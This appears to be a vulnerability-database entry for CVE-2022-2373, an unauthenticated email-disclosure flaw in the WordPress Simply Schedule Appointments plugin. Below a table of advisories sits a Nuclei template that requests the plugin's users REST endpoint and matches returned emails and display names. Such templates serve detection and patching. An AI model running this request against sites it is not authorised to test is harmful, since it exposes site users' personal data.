| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2022-2373 | 29 Aug 2022 18:15 | - | attackerkb |
| CVE-2022-2373 | 29 Aug 2022 22:34 | - | circl |
| WordPress plugin Simply Schedule Appointments security vulnerability | 29 Aug 2022 00:00 | - | cnnvd |
| CVE-2022-2373 | 29 Aug 2022 17:15 | - | cve |
| CVE-2022-2373 Simply Schedule Appointments < 1.5.7.7 - Unauthenticated Email Address Disclosure | 29 Aug 2022 17:15 | - | cvelist |
| EUVD-2022-34640 | 3 Oct 2025 20:07 | - | euvd |
| CVE-2022-2373 | 29 Aug 2022 18:15 | - | nvd |
| WordPress Simply Schedule Appointments plugin <= 1.5.7.6 - Unauthenticated Email Address Disclosure vulnerability | 8 Aug 2022 00:00 | - | patchstack |
| Authentication flaw | 29 Aug 2022 18:15 | - | prion |
| PT-2022-16234 · WordPress · Simply Schedule Appointments | 29 Aug 2022 00:00 | - | ptsecurity |

```yaml
id: CVE-2022-2373

info:
  name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure
  author: theamanrawat,theabhinavgaur
  severity: medium
  description: |
    WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information from the target system.
  remediation: |
    Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability.
  reference:
    - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31
    - https://wordpress.org/plugins/simply-schedule-appointments/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2373
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2373
    cwe-id: CWE-862
    epss-score: 0.08392
    epss-percentile: 0.92456
    cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nsqua
    product: simply_schedule_appointments
    framework: wordpress
  tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua,vuln

http:
  # Single GET to the plugin's users REST endpoint, sent without credentials
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/ssa/v1/users"

    # All three matchers must succeed
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - application/json

      # Body must carry the success marker and a user record;
      # https? accepts both http and https gravatar URLs
      - type: regex
        regex:
          - 'response_code":200'
          - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"https?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008ca1c799d5d1897c3375df04be17e8014cd47fb34fdc8a8019e880f2f312d53f022100fddcc09396093216085e15304b8e2916b6c895be29fa113c4ad1d80c853e0991:922c64590222798bb761d5b6d8e72950
```